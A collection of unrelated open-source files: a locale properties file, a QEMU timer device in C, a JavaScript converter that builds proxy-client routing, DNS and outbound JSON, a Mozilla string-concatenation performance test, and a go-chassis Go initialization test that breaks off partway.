# This code is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# version 2 for more details (a copy is included in the LICENSE file that
# accompanied this code).
#
# You should have received a copy of the GNU General Public License version
# 2 along with this work; if not, write to the Free Software Foundation,
# Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
# or visit www.oracle.com if you need additional information or have any
# questions.
#
# (C) Copyright Taligent, Inc. 1996, 1997 - All Rights Reserved
# (C) Copyright IBM Corp. 1996 - 1999 - All Rights Reserved
#
# The original version of this source code and documentation
# is copyrighted and owned by Taligent, Inc., a wholly-owned
# subsidiary of IBM. These materials are provided under terms
# of a License Agreement between Taligent and Sun. This technology
# is protected by multiple US and International patents.
#
# This notice and attribution to Taligent may not be removed.
# Taligent is a registered trademark of Taligent, Inc.
firstDayOfWeek=2
minimalDaysInFirstWeek=4
| {
"pile_set_name": "Github"
} |
/*
* Syborg Interval Timer.
*
* Copyright (c) 2008 CodeSourcery
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
#include "sysbus.h"
#include "qemu-timer.h"
#include "syborg.h"
//#define DEBUG_SYBORG_TIMER
#ifdef DEBUG_SYBORG_TIMER
#define DPRINTF(fmt, ...) \
do { printf("syborg_timer: " fmt , ##args); } while (0)
#define BADF(fmt, ...) \
do { fprintf(stderr, "syborg_timer: error: " fmt , ## __VA_ARGS__); \
exit(1);} while (0)
#else
#define DPRINTF(fmt, ...) do {} while(0)
#define BADF(fmt, ...) \
do { fprintf(stderr, "syborg_timer: error: " fmt , ## __VA_ARGS__);} while (0)
#endif
enum {
TIMER_ID = 0,
TIMER_RUNNING = 1,
TIMER_ONESHOT = 2,
TIMER_LIMIT = 3,
TIMER_VALUE = 4,
TIMER_INT_ENABLE = 5,
TIMER_INT_STATUS = 6,
TIMER_FREQ = 7
};
typedef struct {
SysBusDevice busdev;
ptimer_state *timer;
int running;
int oneshot;
uint32_t limit;
uint32_t freq;
uint32_t int_level;
uint32_t int_enabled;
qemu_irq irq;
} SyborgTimerState;
static void syborg_timer_update(SyborgTimerState *s)
{
/* Update interrupt. */
if (s->int_level && s->int_enabled) {
qemu_irq_raise(s->irq);
} else {
qemu_irq_lower(s->irq);
}
}
static void syborg_timer_tick(void *opaque)
{
SyborgTimerState *s = (SyborgTimerState *)opaque;
//DPRINTF("Timer Tick\n");
s->int_level = 1;
if (s->oneshot)
s->running = 0;
syborg_timer_update(s);
}
static uint32_t syborg_timer_read(void *opaque, target_phys_addr_t offset)
{
SyborgTimerState *s = (SyborgTimerState *)opaque;
DPRINTF("Reg read %d\n", (int)offset);
offset &= 0xfff;
switch (offset >> 2) {
case TIMER_ID:
return SYBORG_ID_TIMER;
case TIMER_RUNNING:
return s->running;
case TIMER_ONESHOT:
return s->oneshot;
case TIMER_LIMIT:
return s->limit;
case TIMER_VALUE:
return ptimer_get_count(s->timer);
case TIMER_INT_ENABLE:
return s->int_enabled;
case TIMER_INT_STATUS:
return s->int_level;
case TIMER_FREQ:
return s->freq;
default:
cpu_abort(cpu_single_env, "syborg_timer_read: Bad offset %x\n",
(int)offset);
return 0;
}
}
static void syborg_timer_write(void *opaque, target_phys_addr_t offset,
uint32_t value)
{
SyborgTimerState *s = (SyborgTimerState *)opaque;
DPRINTF("Reg write %d\n", (int)offset);
offset &= 0xfff;
switch (offset >> 2) {
case TIMER_RUNNING:
if (value == s->running)
break;
s->running = value;
if (value) {
ptimer_run(s->timer, s->oneshot);
} else {
ptimer_stop(s->timer);
}
break;
case TIMER_ONESHOT:
if (s->running) {
ptimer_stop(s->timer);
}
s->oneshot = value;
if (s->running) {
ptimer_run(s->timer, s->oneshot);
}
break;
case TIMER_LIMIT:
s->limit = value;
ptimer_set_limit(s->timer, value, 1);
break;
case TIMER_VALUE:
ptimer_set_count(s->timer, value);
break;
case TIMER_INT_ENABLE:
s->int_enabled = value;
syborg_timer_update(s);
break;
case TIMER_INT_STATUS:
s->int_level &= ~value;
syborg_timer_update(s);
break;
default:
cpu_abort(cpu_single_env, "syborg_timer_write: Bad offset %x\n",
(int)offset);
break;
}
}
static CPUReadMemoryFunc * const syborg_timer_readfn[] = {
syborg_timer_read,
syborg_timer_read,
syborg_timer_read
};
static CPUWriteMemoryFunc * const syborg_timer_writefn[] = {
syborg_timer_write,
syborg_timer_write,
syborg_timer_write
};
static void syborg_timer_save(QEMUFile *f, void *opaque)
{
SyborgTimerState *s = opaque;
qemu_put_be32(f, s->running);
qemu_put_be32(f, s->oneshot);
qemu_put_be32(f, s->limit);
qemu_put_be32(f, s->int_level);
qemu_put_be32(f, s->int_enabled);
qemu_put_ptimer(f, s->timer);
}
static int syborg_timer_load(QEMUFile *f, void *opaque, int version_id)
{
SyborgTimerState *s = opaque;
if (version_id != 1)
return -EINVAL;
s->running = qemu_get_be32(f);
s->oneshot = qemu_get_be32(f);
s->limit = qemu_get_be32(f);
s->int_level = qemu_get_be32(f);
s->int_enabled = qemu_get_be32(f);
qemu_get_ptimer(f, s->timer);
return 0;
}
static int syborg_timer_init(SysBusDevice *dev)
{
SyborgTimerState *s = FROM_SYSBUS(SyborgTimerState, dev);
QEMUBH *bh;
int iomemtype;
if (s->freq == 0) {
fprintf(stderr, "syborg_timer: Zero/unset frequency\n");
exit(1);
}
sysbus_init_irq(dev, &s->irq);
iomemtype = cpu_register_io_memory(syborg_timer_readfn,
syborg_timer_writefn, s,
DEVICE_NATIVE_ENDIAN);
sysbus_init_mmio(dev, 0x1000, iomemtype);
bh = qemu_bh_new(syborg_timer_tick, s);
s->timer = ptimer_init(bh);
ptimer_set_freq(s->timer, s->freq);
register_savevm(&dev->qdev, "syborg_timer", -1, 1,
syborg_timer_save, syborg_timer_load, s);
return 0;
}
static SysBusDeviceInfo syborg_timer_info = {
.init = syborg_timer_init,
.qdev.name = "syborg,timer",
.qdev.size = sizeof(SyborgTimerState),
.qdev.props = (Property[]) {
DEFINE_PROP_UINT32("frequency",SyborgTimerState, freq, 0),
DEFINE_PROP_END_OF_LIST(),
}
};
static void syborg_timer_register_devices(void)
{
sysbus_register_withprop(&syborg_timer_info);
}
device_init(syborg_timer_register_devices)
| {
"pile_set_name": "Github"
} |
const util = require('util')
const log = require('electron-log')
const base64url = require('base64url')
const readSubConfigBySection = (config, sect) => {
var subConfigNames = []
var currSect = ''
config.match(/[^\r\n]+/g).forEach((line) => {
line = removeLineComments(line)
const s = getSection(line)
if (s.length != 0) {
currSect = s
return // next
}
if (equalSection(currSect, sect)) {
line = line.trim()
if (line.includes('INCLUDE')) {
const parts = line.split(',')
subConfigNames.push(parts[1].trim())
}
}
})
return subConfigNames
}
const sectionAlias = [
['RoutingRule', 'Rule'],
]
const getSection = (line) => {
const re = /^\s*\[\s*([^\]]*)\s*\]\s*$/
if (re.test(line)) {
return line.match(re)[1]
} else {
return ""
}
}
const equalSection = (s1, s2) => {
s1 = s1.trim()
s2 = s2.trim()
for (var i = 0; i < sectionAlias.length; i++) {
if (sectionAlias[i].includes(s1) && sectionAlias[i].includes(s2)) {
return true
}
}
return (s1 == s2)
}
const removeLineComments = (s) => {
return s.replace(/;[^*]*/g, '')
}
const removeJsonLineComments = (s) => {
s = s.replace(/#[^*]*/g, '')
s = s.replace(/\/\/[^*]*/g, '')
return s
}
const removeJsonComments = (s) => {
let lines = []
s.match(/[^\r\n]+/g).forEach((line) => {
lines.push(removeJsonLineComments(line))
})
return lines.join('\n')
}
const getLinesBySection = (conf, sect) => {
var lines = []
var currSect = ''
conf.match(/[^\r\n]+/g).forEach((line) => {
line = removeLineComments(line)
const s = getSection(line)
if (s.length != 0) {
currSect = s
return // next
}
if (equalSection(currSect, sect)) {
line = line.trim()
if (line.length != 0) {
lines.push(line)
}
}
})
return lines
}
const equalRuleType = (t1, t2) => {
if (t1.includes('DOMAIN') && t2.includes('DOMAIN')) {
return true
}
if (t1.includes('IP') && t2.includes('IP')) {
return true
}
if (t1 == t2) {
return true
}
return false
}
const ruleName = (type) => {
if (type.includes('DOMAIN')) {
return 'domain'
} else if (type.includes('IP')) {
return 'ip'
} else if (type.includes('PROCESS')) {
return 'app'
} else if (type.includes('PORT')) {
return 'port'
} else if (type.includes('NETWORK')) {
return 'network'
} else {
return new Error('invalid rule type')
}
}
const nonListType = (type) => {
if (type.includes('PORT') || type.includes('NETWORK') || type.includes('FINAL')) {
return true
}
return false
}
const ruleFilter = (type, filters) => {
if (nonListType(type)) {
if (filters.length > 1) {
return new Error('more that 1 filter in non-list type rule')
}
return filters[0]
} else {
return filters
}
}
const isBalancerTag = (tag, balancers) => {
for (var i = 0; i < balancers.length; i++) {
if (balancers[i].tag == tag) {
return true
}
}
return false
}
const constructRoutingRules = (rule, routing, subconfig, overrideTarget=undefined) => {
var lastType = ''
var lastTarget = ''
var filters = []
var routingRules = []
rule.forEach((line) => {
const parts = line.trim().split(',')
if (parts.length < 2) {
return // next
}
const type = parts[0].trim()
// override target
const target = overrideTarget ? overrideTarget : parts[parts.length-1].trim()
if (filters.length > 0 && (nonListType(type) || !equalRuleType(type, lastType) || target !== lastTarget)) {
var r = {
type: 'field',
}
if (isBalancerTag(lastTarget, routing.balancers)) {
r['balancerTag'] = lastTarget
} else {
r['outboundTag'] = lastTarget
}
r[ruleName(lastType)] = ruleFilter(lastType, filters)
routingRules.push(r)
lastType = ''
lastTarget = ''
filters = []
}
if (type === 'INCLUDE') {
if (parts.length <= 3) {
const content = subconfig['RoutingRule'][parts[1].trim()]
const routingRule = getLinesBySection(content, 'RoutingRule')
const subRules = constructRoutingRules(routingRule, routing, subconfig, parts.length === 3 ? parts[2].trim() : undefined)
routingRules = routingRules.concat(subRules)
} else {
return // next
}
}
if (type !== 'FINAL') {
if (parts.length != 3 && !overrideTarget) {
return // next
}
} else {
if (parts.length != 2) {
return // next
}
}
lastType = type
lastTarget = target
var filter = parts[1].trim()
switch (type) {
case 'DOMAIN-KEYWORD':
filters.push(filter)
break
case 'DOMAIN-SUFFIX':
filters.push(util.format('domain:%s', filter))
break
case 'DOMAIN':
case 'DOMAIN-FULL':
filters.push(util.format('full:%s', filter))
break
case 'IP-CIDR':
filters.push(filter)
break
case 'GEOIP':
filters.push(util.format('geoip:%s', filter))
break
case 'PORT':
filters.push(filter)
break
case 'PROCESS-NAME':
filters.push(filter)
break
case 'NETWORK':
filters.push(filter.split(':').join(','))
break
case 'FINAL':
if (routing.domainStrategy == 'IPIfNonMatch' || routing.domainStrategy == 'IPOnDemand') {
filters.push('0.0.0.0/0')
filters.push('::/0')
lastType = 'IP-CIDR'
} else {
filters.push('tcp,udp')
lastType = 'NETWORK'
}
break
}
})
if (filters.length > 0) {
var r = {
type: 'field',
}
if (isBalancerTag(lastTarget, routing.balancers)) {
r['balancerTag'] = lastTarget
} else {
r['outboundTag'] = lastTarget
}
r[ruleName(lastType)] = ruleFilter(lastType, filters)
routingRules.push(r)
}
return routingRules
}
const constructRouting = (routingConf, strategy, balancer, rule, dns, subconfig) => {
var routing = { balancers: [], rules: [] }
routingConf.forEach((line) => {
const parts = line.trim().split('=')
if (parts.length != 2) {
return // next
}
const k = parts[0].trim()
const v = parts[1].trim()
switch (k) {
case 'domainStrategy':
if (v.length > 0) {
routing.domainStrategy = v
}
break
}
})
// Deprecated
strategy.forEach((line) => {
line = line.trim()
if (line.length != 0) {
routing.domainStrategy = line
}
})
balancer.forEach((line) => {
const parts = line.trim().split(',')
if (parts.length < 2) {
return // next
}
const tag = parts[0].trim()
const selectors = parts[1].trim().split(':').map(x => x.trim())
var bnc = {
tag: tag,
selector: selectors
}
if (parts.length > 2) {
bnc.strategy = parts[2].trim()
}
switch (bnc.strategy) {
case 'latency':
const params = parts.slice(3, parts.length)
params.forEach((p) => {
const ps = p.trim().split('=')
if (ps.length != 2) {
return // next
}
key = ps[0].trim()
val = ps[1].trim()
switch (key) {
case 'timeout':
case 'interval':
case 'delay':
case 'tolerance':
case 'totalMeasures':
bnc[key] = parseInt(val)
break
default:
bnc[key] = val
}
})
break
}
routing.balancers.push(bnc)
})
routing.rules = constructRoutingRules(rule, routing, subconfig)
dns.forEach((line) => {
const parts = line.trim().split('=')
if (parts.length != 2) {
return // next
}
const k = parts[0].trim()
const v = parts[1].trim()
if (k == 'hijack' && v.length > 0) {
routing.rules.unshift({
type: 'field',
outboundTag: v,
inboundTag: ['tun2socks'],
network: 'udp',
port: 53
})
}
})
if (routing.balancers.length == 0) {
delete routing.balancers
}
if (routing.rules.length == 0) {
delete routing.rules
}
return routing
}
const constructDns = (dnsConf, server, rule, host, clientIp) => {
var dns = { servers: [] }
dnsConf.forEach((line) => {
const parts = line.trim().split('=')
if (parts.length != 2) {
return // next
}
const k = parts[0].trim()
const v = parts[1].trim()
if (k == 'clientIp' && v.length > 0) {
dns.clientIp = v
}
})
// Deprecated
if (clientIp.length == 1) {
const ip = clientIp[0].trim()
if (ip.length > 0) {
dns.clientIp = ip
}
}
host.forEach((line) => {
const parts = line.trim().split('=')
if (parts.length != 2) {
return // next
}
const domain = parts[0].trim()
const ip = parts[1].trim()
if (domain.length == 0 || ip.length == 0) {
return // next
}
if (!dns.hasOwnProperty('hosts')) {
dns.hosts = {}
}
dns.hosts[domain] = ip
})
var servers = []
var rules = []
rule.forEach((line) => {
const parts = line.trim().split(',')
if (parts.length != 3) {
return // next
}
const type = parts[0].trim()
var filter = parts[1].trim()
const tag = parts[2].trim()
switch (type) {
case 'DOMAIN-SUFFIX':
filter = util.format('domain:%s', filter)
break
case 'DOMAIN':
case 'DOMAIN-FULL':
filter = util.format('full:%s', filter)
break
}
rules.push({
filter: filter,
tag: tag
})
})
server.forEach((line) => {
const parts = line.trim().split(',')
if (parts.length == 1) {
if (process.platform == 'win32' && parts[0].trim() == 'localhost') {
const sysDnsServers = require('dns').getServers()
sysDnsServers.forEach((sysDns) => {
servers.push({
address: sysDns
})
})
} else {
servers.push({
address: parts[0].trim()
})
}
} else if (parts.length == 3) {
var filters = []
rules.forEach((r) => {
if (r.tag == parts[2].trim()) {
filters.push(r.filter)
}
})
servers.push({
address: parts[0].trim(),
port: parseInt(parts[1].trim()),
filters: filters
})
}
})
servers.forEach((s) => {
if (s.hasOwnProperty('port') && s.hasOwnProperty('filters')) {
dns.servers.push({
address: s.address,
port: parseInt(s.port),
domains: s.filters
})
} else {
dns.servers.push(s.address)
}
})
if (dns.servers.length == 0) {
delete dns.servers
}
return dns
}
const constructLog = (logLines) => {
var log = {}
logLines.forEach((line) => {
const parts = line.trim().split('=')
if (parts.length != 2) {
return // next
}
switch (parts[0].trim()) {
case 'loglevel':
log.loglevel = parts[1].trim()
}
})
return log
}
const freedomOutboundParser = (tag, params) => {
var ob = {
"protocol": "freedom",
"tag": tag
}
let settings = {}
params.forEach((param) => {
const kv = param.trim().split('=')
if (kv.length != 2) {
return
}
switch (kv[0].trim()) {
case 'domainStrategy':
settings.domainStrategy = kv[1].trim()
break
}
})
if (Object.keys(settings).length != 0) {
ob.settings = settings
}
return ob
}
const blackholeOutboundParser = (tag, params) => {
let ob = {
"protocol": "blackhole",
"tag": tag
}
let settings = {}
params.forEach((param) => {
const kv = param.trim().split('=')
if (kv.length != 2) {
return
}
switch (kv[0].trim()) {
case 'type':
settings.response = { type: kv[1].trim() }
break
}
})
if (Object.keys(settings).length != 0) {
ob.settings = settings
}
return ob
}
const httpAndSocksOutboundParser = (protocol, tag, params) => {
var ob = {
"protocol": protocol,
"tag": tag
}
var address = ''
var port = 0
var user = ''
var pass = ''
params.forEach((param) => {
const parts = param.trim().split('=')
if (parts.length != 2) {
return
}
switch (parts[0].trim()) {
case 'address':
address = parts[1].trim()
break
case 'port':
port = parseInt(parts[1].trim())
break
case 'user':
user = parts[1].trim()
break
case 'pass':
pass = parts[1].trim()
break
}
})
if (!ob.hasOwnProperty('settings')) {
ob.settings = {
servers: []
}
}
var server = {
address: address,
port: port,
users: []
}
if (user.length > 0 && pass.length > 0) {
server.users.push({
user: user,
pass: pass
})
}
if (server.users.length == 0) {
delete server.users
}
ob.settings.servers.push(server)
return ob
}
const dnsOutboundParser = (tag, params) => {
let ob = {
"protocol": "dns",
"tag": tag,
"settings": {}
}
let settings = {}
params.forEach((param) => {
const kv = param.trim().split('=')
if (kv.length != 2) {
return
}
switch (kv[0].trim()) {
case 'network':
ob.settings.network = kv[1].trim()
break
case 'address':
ob.settings.address = kv[1].trim()
break
case 'port':
ob.settings.port = parseInt(kv[1].trim())
break
}
})
if (Object.keys(settings).length != 0) {
ob.settings = settings
}
return ob
}
const vmess1Parser = (tag, params) => {
var ob = {
"protocol": "vmess",
"tag": tag,
"settings": {
"vnext": []
},
"streamSettings": {}
}
if (params.length > 1) {
return new Error('invalid vmess1 parameters')
}
const url = new URL(params[0].trim())
const uuid = url.username
const address = url.hostname
const port = url.port
const path = url.pathname
const query = decodeURIComponent(url.search.substr(1))
const tlsSettings = {}
const wsSettings = {}
const httpSettings = {}
const kcpSettings = {}
const quicSettings = {}
const mux = {}
const sockopt = {}
let header = null
ob.settings.vnext.push({
users: [{
"id": uuid
}],
address: address,
port: parseInt(port),
})
const parts = query.split('&')
parts.forEach((q) => {
const kv = q.split('=')
switch (kv[0]) {
case 'network':
ob.streamSettings.network = kv[1]
break
case 'tls':
if (kv[1] == 'true') {
ob.streamSettings.security = 'tls'
} else {
ob.streamSettings.security = 'none'
}
break
case 'tls.allowinsecure':
if (kv[1] == 'true') {
tlsSettings.allowInsecure = true
} else {
tlsSettings.allowInsecure = false
}
break
case 'tls.servername':
tlsSettings.serverName = kv[1]
break
case 'ws.host':
let host = kv[1].trim()
if (host.length != 0) {
wsSettings.headers = { Host: host }
}
break
case 'http.host':
let hosts = []
kv[1].trim().split(',').forEach((h) => {
if (h.trim().length != 0) {
hosts.push(h.trim())
}
})
if (hosts.length != 0) {
httpSettings.host = hosts
}
break
case 'mux':
var v = parseInt(kv[1].trim())
if (v > 0) {
mux.enabled = true
mux.concurrency = v
}
break
case 'sockopt.tos':
var v = parseInt(kv[1].trim())
if (v > 0) {
sockopt.tos = v
}
break
case 'sockopt.tcpfastopen':
if (kv[1] == 'true') {
sockopt.tcpFastOpen = true
} else {
sockopt.tcpFastOpen = false
}
break
// header type for both kcp and quic (maybe tcp later, not planed)
case 'header':
header = kv[1]
break
case 'kcp.mtu':
kcpSettings.mtu = parseInt(kv[1].trim())
break
case 'kcp.tti':
kcpSettings.tti = parseInt(kv[1].trim())
break
case 'kcp.uplinkcapacity':
kcpSettings.uplinkCapacity = parseInt(kv[1].trim())
break
case 'kcp.downlinkcapacity':
kcpSettings.downlinkCapacity = parseInt(kv[1].trim())
break
case 'kcp.congestion':
if (kv[1] == 'true') {
kcpSettings.congestion = true
} else {
kcpSettings.congestion = false
}
break
case 'quic.security':
quicSettings.security = kv[1].trim()
break
case 'quic.key':
quicSettings.key = kv[1]
break
}
})
if (Object.keys(tlsSettings).length != 0) {
if (ob.streamSettings.security == 'tls') {
ob.streamSettings.tlsSettings = tlsSettings
}
}
if (Object.keys(sockopt).length != 0) {
ob.streamSettings.sockopt = sockopt
}
switch (ob.streamSettings.network) {
case 'ws':
if (path.length != 0) {
wsSettings.path = path
}
if (Object.keys(wsSettings).length != 0) {
ob.streamSettings.wsSettings = wsSettings
}
break
case 'http':
case 'h2':
if (path.length != 0) {
httpSettings.path = path
}
if (Object.keys(httpSettings).length != 0) {
ob.streamSettings.httpSettings = httpSettings
}
break
case 'kcp':
case 'mkcp':
if (header) {
kcpSettings.header = { type: header }
}
if (Object.keys(kcpSettings).length != 0) {
ob.streamSettings.kcpSettings = kcpSettings
}
break
case 'quic':
if (header) {
quicSettings.header = { type: header }
}
if (Object.keys(quicSettings).length != 0) {
ob.streamSettings.quicSettings = quicSettings
}
break
}
if (Object.keys(mux).length != 0) {
ob.mux = mux
}
return ob
}
const ssParser = (tag, params) => {
var ob = {
"protocol": "shadowsocks",
"tag": tag,
"settings": {
"servers": []
}
}
if (params.length > 1) {
return new Error('invalid shadowsocks parameters')
}
const url = new URL(params[0].trim())
const userInfo = url.username
const address = url.hostname
const port = url.port
var method
var password
if (url.password.length == 0) {
const parts = base64url.decode(decodeURIComponent(userInfo)).split(':')
if (parts.length != 2) {
return new Error('invalid user info')
}
method = parts[0]
password = parts[1]
} else {
method = url.username
password = url.password
}
ob.settings.servers.push({
method: method,
password: password,
address: address,
port: parseInt(port)
})
return ob
}
const builtinParser = (tag, params) => {
switch (protocol = params[0].trim()) {
case 'freedom':
return freedomOutboundParser(tag, params.slice(1, params.length))
case 'blackhole':
return blackholeOutboundParser(tag, params.slice(1, params.length))
case 'dns':
return dnsOutboundParser(tag, params.slice(1, params.length))
case 'http':
case 'socks':
return httpAndSocksOutboundParser(protocol, tag, params.slice(1, params.length))
}
}
const parsers = {
builtin: builtinParser,
vmess1: vmess1Parser,
ss: ssParser,
}
const constructOutbounds = (endpoint) => {
var outbounds = []
endpoint.forEach((line) => {
const parts = line.trim().split(',')
if (parts.length < 2) {
return // next
}
const tag = parts[0].trim()
const parser = parts[1].trim()
const params = parts.slice(2, parts.length)
const p = parsers[parser]
if (p instanceof Function) {
let outbound = p(tag, params)
outbounds.push(outbound)
} else {
log.warn('parser not found: ', parser)
}
})
return outbounds
}
const constructSystemInbounds = (opts) => {
var inbounds = []
if (opts && opts.enabled) {
inbounds = [
{
"port": opts.socksPort,
"protocol": "socks",
"listen": "127.0.0.1",
"settings": {
"auth": "noauth",
"udp": false
}
},
{
"port": opts.httpPort,
"protocol": "http",
"listen": "127.0.0.1",
"settings": {}
}
]
}
return inbounds
}
const appendInbounds = (config, inbounds) => {
if (inbounds.length > 0) {
if (config.inbounds) {
const newPorts = inbounds.map(nib => nib.port)
config.inbounds = config.inbounds.filter((ib) => {
return !newPorts.includes(ib.port)
})
config.inbounds.push(...inbounds)
} else {
config['inbounds'] = inbounds
}
}
return config
}
const constructJson = (conf, subConf) => {
const routingDomainStrategy = getLinesBySection(conf, 'RoutingDomainStrategy')
const routingConf = getLinesBySection(conf, 'Routing')
const balancerRule = getLinesBySection(conf, 'EndpointGroup')
const routingRule = getLinesBySection(conf, 'RoutingRule')
const dnsConf = getLinesBySection(conf, 'Dns')
const routing = constructRouting(routingConf, routingDomainStrategy, balancerRule, routingRule, dnsConf, subConf)
const dnsServer = getLinesBySection(conf, 'DnsServer')
const dnsRule = getLinesBySection(conf, 'DnsRule')
const dnsHost = getLinesBySection(conf, 'DnsHost')
const dnsClientIp = getLinesBySection(conf, 'DnsClientIp')
const dns = constructDns(dnsConf, dnsServer, dnsRule, dnsHost, dnsClientIp)
const logLines = getLinesBySection(conf, 'Log')
const log = constructLog(logLines)
const endpoint = getLinesBySection(conf, 'Endpoint')
const outbounds = constructOutbounds(endpoint)
var o = {
log: log,
dns: dns,
outbounds: outbounds,
routing: routing
}
for (var prop in o) {
if (Object.entries(o[prop]).length === 0) {
delete o[prop]
}
}
return o
}
module.exports = {
getLinesBySection,
constructRouting,
constructDns,
constructLog,
constructOutbounds,
constructJson,
constructSystemInbounds,
appendInbounds,
removeJsonComments,
readSubConfigBySection
}
if (typeof require !== 'undefined' && require.main === module) {
const readline = require('readline')
const rl = readline.createInterface({
input: process.stdin,
output: process.stdout,
terminal: false
})
var lines = []
rl.on('line', (line) => {
lines.push(line)
})
rl.on('close', () => {
console.log(JSON.stringify(constructJson(lines.join('\n')), null, 2))
})
}
| {
"pile_set_name": "Github"
} |
/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */
/* ***** BEGIN LICENSE BLOCK *****
* Version: MPL 1.1/GPL 2.0/LGPL 2.1
*
* The contents of this file are subject to the Mozilla Public License Version
* 1.1 (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
* http://www.mozilla.org/MPL/
*
* Software distributed under the License is distributed on an "AS IS" basis,
* WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
* for the specific language governing rights and limitations under the
* License.
*
* The Original Code is JavaScript Engine testing utilities.
*
* The Initial Developer of the Original Code is
* Mozilla Foundation.
* Portions created by the Initial Developer are Copyright (C) 2005
* the Initial Developer. All Rights Reserved.
*
* Contributor(s): [email protected]
* Bob Clary <[email protected]>
*
* Alternatively, the contents of this file may be used under the terms of
* either the GNU General Public License Version 2 or later (the "GPL"), or
* the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
* in which case the provisions of the GPL or the LGPL are applicable instead
* of those above. If you wish to allow use of your version of this file only
* under the terms of either the GPL or the LGPL, and not to allow others to
* use your version of this file under the terms of the MPL, indicate your
* decision by deleting the provisions above and replace them with the notice
* and other provisions required by the GPL or the LGPL. If you do not delete
* the provisions above, a recipient may use your version of this file under
* the terms of any one of the MPL, the GPL or the LGPL.
*
* ***** END LICENSE BLOCK ***** */
//-----------------------------------------------------------------------------
var BUGNUMBER = 56940;
var summary = 'String concat should not be O(N**2)';
var actual = '';
var expect = '';
printBugNumber(BUGNUMBER);
printStatus (summary);
var data = {X:[], Y:[]};
for (var size = 1000; size <= 10000; size += 1000)
{
data.X.push(size);
data.Y.push(concat(size));
gc();
}
var order = BigO(data);
var msg = '';
for (var p = 0; p < data.X.length; p++)
{
msg += '(' + data.X[p] + ', ' + data.Y[p] + '); ';
}
printStatus(msg);
printStatus('Order: ' + order);
reportCompare(true, order < 2, 'BigO ' + order + ' < 2');
function concat(size)
{
var x = '';
var y = 'Mozilla Mozilla Mozilla Mozilla ';
var z = 'goober ';
var start = new Date();
for (var loop = 0; loop < size; loop++)
{
x += y + z + y + z + y + z;
}
var stop = new Date();
return stop - start;
}
| {
"pile_set_name": "Github"
} |
package chassis_test
import (
"os"
"path/filepath"
"reflect"
"testing"
"github.com/go-chassis/go-chassis/v2"
"github.com/go-chassis/go-chassis/v2/core/config"
"github.com/go-chassis/go-chassis/v2/core/lager"
"github.com/go-chassis/go-chassis/v2/core/server"
"github.com/go-chassis/go-chassis/v2/pkg/util/fileutil"
"github.com/go-chassis/go-chassis/v2/core/config/model"
"github.com/stretchr/testify/assert"
"syscall"
)
const (
Provider = "provider"
)
func TestInit(t *testing.T) {
mask := syscall.Umask(0)
defer syscall.Umask(mask)
t.Log("Testing Chassis Init function")
os.Setenv("CHASSIS_HOME", filepath.Join(os.Getenv("GOPATH"), "test", "chassisInit"))
err := os.MkdirAll(fileutil.GetConfDir(), 0700)
assert.NoError(t, err)
globalDefFile, err := os.OpenFile(fileutil.GlobalConfigPath(), os.O_CREATE|os.O_RDWR|os.O_TRUNC, 0700)
defer globalDefFile.Close()
// write some text line-by-line to file
_, err = globalDefFile.WriteString(`---
controlPanel:
infra: istio
settings:
Address: xxx
cse:
flowcontrol:
Consumer:
qps:
enabled: true
limit:
Server.EmployServer: 100
loadbalance:
strategy:
name: RoundRobin
retryEnabled: false
retryOnNext: 2
retryOnSame: 3
backoff:
kind: constant
minMs: 200
maxMs: 400
servicecomb:
registry:
type: servicecenter
scope: full
address: http://127.0.0.1:30100
refreshInterval : 30s
watch: true
register: reg
protocols:
rest:
listenAddress: 127.0.0.1:5001
handler:
chain:
Consumer:
rest: bizkeeper-consumer, loadbalance
Provider:
rest: bizkeeper-provider
ssl:
registry.consumer.cipherPlugin: default
registry.consumer.verifyPeer: false
registry.consumer.cipherSuits: TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
registry.consumer.protocol: TLSv1.2
registry.consumer.caFile:
registry.consumer.certFile:
registry.consumer.keyFile:
registry.consumer.certPwdFile:
`)
assert.NoError(t, err)
msDefFile, err := os.OpenFile(fileutil.MicroServiceConfigPath(), os.O_CREATE|os.O_RDWR|os.O_TRUNC, 0700)
assert.NoError(t, err)
defer msDefFile.Close()
_, err = msDefFile.WriteString(`---
#微服务的私有属性
servicecomb:
service:
name: nodejs2
version: 0.1
properties:
allowCrossApp: true
instanceProperties:
a: s
p: s
`)
lager.Init(&lager.Options{
LoggerLevel: "INFO",
})
config.GlobalDefinition = &model.GlobalCfg{}
config.Init()
config.GlobalDefinition.ServiceComb.Registry.AutoRegister = "abc"
chassis.SetDefaultConsumerChains(nil)
chassis.SetDefaultProviderChains(nil)
sigs := []os.Signal{syscall.SIGINT, syscall.SIGHUP, syscall.SIGTERM, syscall.SIGQUIT, syscall.SIGILL, syscall.SIGTRAP, syscall.SIGABRT}
chassis.HajackSignal(sigs...)
chassis.InstalPreShutdown("pre_test", func(os.Signal) {
t.Log("pre_shutdown_test")
})
chassis.InstalPostShutdown("post_test", func(os.Signal) {
t.Log("post_shutdown_test")
})
chassis.HajackGracefulShutdown(chassis.GracefulShutdown)
err = chassis.Init()
assert.NoError(t, err)
